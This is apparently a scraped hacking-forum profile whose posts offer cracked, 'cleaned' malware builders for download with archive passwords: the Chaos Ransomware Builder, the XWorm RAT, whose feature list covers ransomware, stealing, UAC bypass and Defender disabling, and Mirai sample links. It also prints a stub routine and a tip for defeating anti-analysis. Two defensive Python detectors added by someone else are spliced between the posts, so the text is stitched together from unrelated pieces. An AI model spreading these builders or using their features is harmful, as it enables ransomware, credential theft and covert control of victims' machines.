https://www.hybrid-a...bea7613be08cb8b

 

Mirai.exe 2

https://www.virustot...d71dea20483ae6b

https://www.hybrid-a...d71dea20483ae6b

 

Mirai.exe 3

https://www.virustot...c2657/detection

https://www.hybrid-a...347479987ec2657

https://www.virustot...be5_Zenbox/html

 

New Build Mirai:

https://www.virustot...be2db/detection

https://www.hybrid-a...c12c1269e7eefd8

 

stripelib.dll

https://www.virustot...c96cb22860cbbe5

 

Download:

Password: Nulled123

https://anonfiles.co...fy2/Samples_zip
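A detection-side example added here (my code, not the author's and not the malware's) for the launch pattern the post describes: rundll32.exe loading a DLL dropped under %AppData%\Roaming and calling an export by name. It parses rundll32 command lines and flags DLLs loaded from user-writable profile paths; the sample command lines are constructed to mirror the post, and the directory lists, thresholds and function names are this example's own choices.

```python
"""Flag rundll32.exe launches that load a DLL from a user-writable profile
directory, the pattern described in the post (a DLL dropped under
%AppData%\\Roaming and run via rundll32 with a custom export).

The command lines below are constructed to mirror that behaviour; they are
not real telemetry. The path lists are this example's own choices.
"""
import ntpath

# Directories from which OS-shipped DLLs are normally loaded (lower-case).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Profile locations any user-level process can write to (lower-case fragments).
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\downloads\\")


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes
    (which are dropped). Backslashes stay literal, unlike shlex's POSIX mode."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_rundll32(cmdline: str):
    """Return (dll_path, export) for a rundll32 command line, else None.
    rundll32 accepts '<dll>,<export> [args]' and '<dll> <export> [args]'."""
    tokens = split_cmdline(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("rundll32.exe", "rundll32"):
        return None
    if len(tokens) < 2:
        return None
    if "," in tokens[1]:
        dll, export = tokens[1].split(",", 1)
    else:
        dll, export = tokens[1], (tokens[2] if len(tokens) > 2 else "")
    return dll, export


def assess(cmdline: str) -> dict:
    """Classify one process-creation command line."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return {"rundll32": False, "suspicious": False}
    dll, export = parsed
    dll_l = dll.lower()
    from_user_dir = any(frag in dll_l for frag in USER_WRITABLE)
    # A bare name (shell32.dll) resolves through the loader search path and is
    # not judged here; only explicit paths outside the system dirs are noted.
    outside_system = "\\" in dll_l and not dll_l.startswith(SYSTEM_DIRS)
    return {
        "rundll32": True,
        "dll": dll,
        "export": export,
        "user_writable_path": from_user_dir,
        "outside_system_dirs": outside_system,
        "suspicious": from_user_dir,   # alert only on the user-writable case
    }


def scan(cmdlines) -> list[dict]:
    """Return the assessments that should raise an alert."""
    return [a for a in map(assess, cmdlines) if a["suspicious"]]


# Constructed sample events (not real logs). The second mirrors the post's
# description: a DLL under AppData\Roaming run through rundll32 by export name.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL hotplug.dll',
    r'"C:\Windows\System32\rundll32.exe" "C:\Users\bob\AppData\Roaming\stripelib.dll",threadFunc',
    r'C:\Windows\System32\rundll32.exe C:\Windows\System32\ieframe.dll,OpenURL https://example.test/',
    r'C:\Windows\System32\notepad.exe C:\Users\bob\notes.txt',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(f"ALERT rundll32 loading {hit['dll']} export={hit['export']!r}")
```

The alert keys on where the DLL lives rather than on the export name, because plenty of legitimate software calls rundll32 with its own exports; a DLL under a user-writable profile path is the part a dropper cannot avoid, and the `outside_system_dirs` field is kept as context for triage rather than as a trigger.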




#40900861 LOOKING FOR ANYONE good with "Malware Analysis" - WILL PAY WELL

Posted by ObbedCode on 30 November 2022 - 07:32 PM in Service Requests

hmmmmm




#40899550 BEST DDoS TOOLs ( BEST DDOS ATTACK LAYER 4 , LAYER 7)

Posted by ObbedCode on 30 November 2022 - 05:08 PM in Cracking Tools

hmmmok




#40874722 Chaos Ransomware Builder V4 - Cleaned by ObbedCode

Posted by ObbedCode on 28 November 2022 - 05:21 AM in Cracked Programs

To clean the file we have to rename a .DLL to .EXE and modify some sus IL code.

Removed the original .exe that is just a virus :(

Note I cleaned the file, you can analyze the file for yourself in dnSpy.

Still run everything in a controlled environment. My version is the fully cleaned version.

Even has the decryptor in the same folder

Person Spreading Malware:

Original Report:

===================================================================

DOWNLOAD

===================================================================

Password: Chaos46366


Upload.ee

Anonfile

Zippyshare

Mirror Ace

===================================================================

SCREENSHOTS

===================================================================

Original Analysis:

(Still always run EVERYTHING in a sandbox / virtual machine)

Stub SRC:

https://ghostbin.me/638423de9f983

VT:

https://www.virustot...73a40/detection

HB:

https://www.hybrid-a...12f35ab45e73a40

https://www.hybrid-a...7de157a8227672a




#40874318 Chaos Ransomware Builder

Posted by ObbedCode on 28 November 2022 - 03:47 AM in Cracked Programs

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

~ Been modified today ...

~ ICON looks off

~ Assembly attributes look odd

~ The original .exe is a Python file and the .dll is .NET?

~ When renaming it from .dll to .exe it is the original .exe, so the Python installer file is the infected file

~ The infected file is poorly coded to the point it just crashes for me

~ maaruii had code to kill any process in %AppData%, I'm pretty sure it was for something else but shit code, I removed it

    using System;
    using System.Diagnostics;

    // Routine found in the stub: kill every process whose main module lives under %AppData%.
    // Process.MainModule throws (access denied, 32/64-bit mismatch) for many system processes,
    // which is why the original swallows everything in an empty catch.
    static void KillAppDataProcesses()
    {
        string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
        Process[] processes = Process.GetProcesses();
        foreach (Process process in processes)
        {
            try
            {
                if (process.MainModule.FileName.Contains(folderPath))
                {
                    process.Kill();
                }
            }
            catch
            {
                // MainModule not readable for this process; skip it
            }
        }
    }

~ Stub SRC Code: https://ghostbin.me/638423de9f983

Scans on malicious file "Chaos Ransomware Builder  v4.exe"

~ VT: https://www.virustot...c519c/detection

~ HB: https://www.hybrid-a...96db174f30259f2

~ Connects to Discord, maybe a webhook?

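The two tells in the post above (a ".dll" that is really the original .exe, and a launcher that is a bundled Python script rather than the .NET builder it claims to be) can be read straight from the PE headers before anything is executed. The following is an added example, not code from the original post or from any tool it names: it checks the IMAGE_FILE_DLL bit in the COFF characteristics, the CLR runtime header (data directory entry 14) and the PyInstaller archive cookie, and runs on two constructed, header-only PE images, not on the real samples. The file names sample_builder.dll / sample_builder.exe and the RVA/size values are made up for the demonstration.

```python
import struct

# PyInstaller CArchive cookie magic (from the PyInstaller bootloader); a PE that
# carries it is a bundled Python script, whatever its icon and extension say.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

IMAGE_FILE_DLL = 0x2000
CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def triage_pe(data: bytes) -> dict:
    """Parse just enough of the PE headers to answer: DLL or EXE image, PE32 or
    PE32+, does it carry a CLR header (.NET), and is a PyInstaller cookie present."""
    info = {"is_pe": False, "is_dll": False, "pe32plus": False,
            "is_dotnet": False, "subsystem": 0, "pyinstaller": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    coff = e_lfanew + 4
    if len(data) < coff + 20:
        return info
    _machine, _nsec, _ts, _sym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if len(data) < opt + opt_size or opt_size < 96:
        return info
    magic = struct.unpack_from("<H", data, opt)[0]
    pe32plus = magic == 0x20B
    # Subsystem is at +68 in both PE32 and PE32+ optional headers
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    # Data directories start at +96 (PE32) or +112 (PE32+); their count is the DWORD before them
    dd_off = opt + (112 if pe32plus else 96)
    n_dirs = struct.unpack_from("<I", data, dd_off - 4)[0]
    clr_rva = clr_size = 0
    if n_dirs > CLR_DIRECTORY_INDEX and len(data) >= dd_off + (CLR_DIRECTORY_INDEX + 1) * 8:
        clr_rva, clr_size = struct.unpack_from("<II", data, dd_off + CLR_DIRECTORY_INDEX * 8)
    info.update(is_pe=True, is_dll=bool(chars & IMAGE_FILE_DLL), pe32plus=pe32plus,
                is_dotnet=clr_rva != 0 and clr_size != 0, subsystem=subsystem,
                pyinstaller=PYINSTALLER_MAGIC in data)
    return info


def triage_findings(filename: str, data: bytes) -> list:
    """Turn the header facts into the mismatches an analyst cares about."""
    info = triage_pe(data)
    if not info["is_pe"]:
        return ["not a PE file"]
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    findings = []
    if ext == "dll" and not info["is_dll"]:
        findings.append("IMAGE_FILE_DLL not set: a .exe renamed to .dll")
    if ext == "exe" and info["is_dll"]:
        findings.append("IMAGE_FILE_DLL set: a .dll renamed to .exe")
    findings.append(".NET assembly (CLR header present)" if info["is_dotnet"]
                    else "native PE (no CLR header)")
    if info["pyinstaller"]:
        findings.append("PyInstaller cookie found: bundled Python script, not a .NET builder")
    return findings


def build_pe(pe32plus: bool, dll: bool, dotnet: bool, trailer: bytes = b"") -> bytes:
    """Constructed, header-only PE used as sample input (not a real binary)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE signature right after DOS header
    opt_size = 240 if pe32plus else 224
    chars = 0x0002 | (IMAGE_FILE_DLL if dll else 0)    # IMAGE_FILE_EXECUTABLE_IMAGE (+ DLL flag)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, 2)                 # IMAGE_SUBSYSTEM_WINDOWS_GUI
    dd_off = 112 if pe32plus else 96
    struct.pack_into("<I", opt, dd_off - 4, 16)        # NumberOfRvaAndSizes
    if dotnet:
        # made-up CLR header RVA/size, enough to mark the image as managed
        struct.pack_into("<II", opt, dd_off + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + trailer


if __name__ == "__main__":
    # Sample 1: a .NET EXE image shipped with a .dll extension
    renamed = build_pe(pe32plus=False, dll=False, dotnet=True)
    for line in triage_findings("sample_builder.dll", renamed):
        print("sample_builder.dll:", line)
    # Sample 2: a 64-bit native EXE carrying a PyInstaller archive
    bundled = build_pe(pe32plus=True, dll=False, dotnet=False,
                       trailer=PYINSTALLER_MAGIC + b"\0" * 24)
    for line in triage_findings("sample_builder.exe", bundled):
        print("sample_builder.exe:", line)
```

On a real file, pass open(path, "rb").read() to triage_findings. The IMAGE_FILE_DLL mismatch alone is not proof of tampering, but a ".dll" that is an EXE image next to an ".exe" with no CLR header and a PyInstaller cookie is exactly the swap the post describes, and this check costs nothing compared to opening it in dnSpy.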



#40542190 XWORM V2.1 CRACKED - | UAC * WORM * RunPE * Clipper | Cleaned By ObbedCode

Posted by ObbedCode on 29 October 2022 - 08:16 AM in Cracked Programs

For a second I assumed it was the stub dropping in the TEMP dir from the second "builder.exe" file, as that was being executed, but I assumed if it was not connected to a valid server that would exit the stub. I was reversing it for a TCP connection and realized it is using a Telegram channel to send data to. The RAT uses a TCP connection over a custom port, Telegram is not involved. So come to find out, it was his stealer he binded.

 

So you almost got me :< but the weird admin prompt?, the fake error?, and ofc dropping this in the %temp% folder on disk for AVs to scan un-obfuscated code. 6/10 I give it :(

Good concept?

PS, yes this is the CLEAN version, still run in sandbox tho. Good practices :D

Screenshots of Program

====================================================

FEATURES

====================================================

[+] Run File From URL / Disk / Memory / RunPE

[+] Blank Screen, Disable Win Updates, Run Shell, Invoke BSOD

[+] .NET 3.5 Installer

[+] UAC / Firewall / Taskmgr / RegEdit Disabler + Enabler

[+] Shell / Webcam / MIC / Monitor / System Sound / File Manager Control

[+] TCP Connections Monitor

[+] Clipboard Manager + Password Manager

[+] Installed Programs Manager

[+] Activate Windows Option

[+] DDoS

[+] VB.NET Compiler / Google Maps

[+] Fun Functions

[+] Keylogger / Chat / File Searcher

[+] USB Spread + Bot Killer

[+] Prevent Sleep / Auto Sleep Disabler / Change Wallpaper / Message Box Popup / Delete Restore Points

[+] UAC Bypass

[+] Coin Clipper / Swapper

[+] Ransomware

[+] Ngrok Installer

[+] Tinynuke HVNC

[+] VNC Viewer

[+] Windows Defender Disabler / Remover / Exclusion

[+] Startup: Registry / Folder / SCHTASKS aka Scheduled Tasks

[+] Worm

[+] Anti Analysis

That's most of it :P

====================================================

DOWNLOAD

====================================================

Password:

NULLED.TO

AnonFile

Zippyshare

Upload.ee

Sendspace

MirrorAce

Analysis of Infected File:

VT:

XWorm-RAT-V2.1-builder.exe => https://www.virustot...aefe66807eac93a

win-xworm-builder => https://www.virustot...e2307b80a560319

~ Telegram stealer dropped in %temp% dir under "win-xworm-builder.exe"

~ Has basic anti-analysis, as that was part of why I'd assume it was cracking so it was just the stub, either way easy to bypass "CALL => NOP" ;)

~ Telegram Chat Channel ID 2024893777

~ Steals From

https://imgur.com/a/bqXIFS6

https://imgur.com/a/lxFgPm4